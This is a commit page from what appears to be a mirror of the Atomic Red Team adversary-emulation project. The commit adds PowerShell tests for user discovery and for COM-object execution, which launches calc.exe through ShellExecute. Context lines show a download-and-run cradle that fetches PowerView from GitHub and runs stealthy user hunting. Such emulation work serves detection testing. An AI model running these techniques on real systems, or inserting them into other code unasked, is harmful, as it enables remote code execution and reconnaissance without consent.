security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Powershell tactics (#1825)

Browse Source 
* Update T1112.yaml

* Update T1112.yaml

* typos

* Update T1033.yaml

* Update T1033.yaml

* Update T1546.015.yaml

* Update T1546.015.yaml

* Update T1033.yaml

* Update T1546.015.yaml

* Update T1546.015.yaml

* Update T1546.015.yaml

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
This commit is contained in:
tccontre
2022-03-23 18:44:16 +01:00
committed by GitHub
parent bd96789f31
commit a41a63ffd9
2 changed files with 37 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1033/T1033.yaml
+23
View File
@@ -51,3 +51,26 @@ atomic_tests:
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-UserHunter -Stealth -Verbose
name: powershell
- name: User Discovery With Env Vars PowerShell Script
auto_generated_guid: dcb6cdee-1fb0-4087-8bf8-88cfd136ba51
description: Use the PowerShell environment variables to identify the current logged user.
supported_platforms:
- windows
executor:
command: |
[System.Environment]::UserName | Out-File -FilePath .\CurrentactiveUser.txt
$env:UserName | Out-File -FilePath .\CurrentactiveUser.txt -Append
cleanup_command: |
Remove-Item -Path .\CurrentactiveUser.txt -Force
name: powershell
- name: GetCurrent User with PowerShell Script
auto_generated_guid: 1392bd0f-5d5a-429e-81d9-eb9d4d4d5b3b
description: Use the PowerShell "GetCurrent" method of the WindowsIdentity .NET class to identify the logged user.
supported_platforms:
- windows
executor:
command: |
[System.Security.Principal.WindowsIdentity]::GetCurrent() | Out-File -FilePath .\CurrentUserObject.txt
cleanup_command: |
Remove-Item -Path .\CurrentUserObject.txt -Force
name: powershell
atomics/T1546.015/T1546.015.yaml
+14
View File
@@ -40,3 +40,17 @@ atomic_tests:
cleanup_command: |-
Remove-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}' -Recurse -ErrorAction Ignore
name: powershell
- name: Powershell Execute COM Object
auto_generated_guid: 752191b1-7c71-445c-9dbe-21bb031b18eb
description: Use the PowerShell to execute COM CLSID object.
Reference: https://pentestlab.blog/2020/05/20/persistence-com-hijacking/
supported_platforms:
- windows
executor:
command: |
$o= [activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39"))
$item = $o.Item()
$item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0)
cleanup_command: |
Get-Process -Name "*calc" | Stop-Process
name: powershell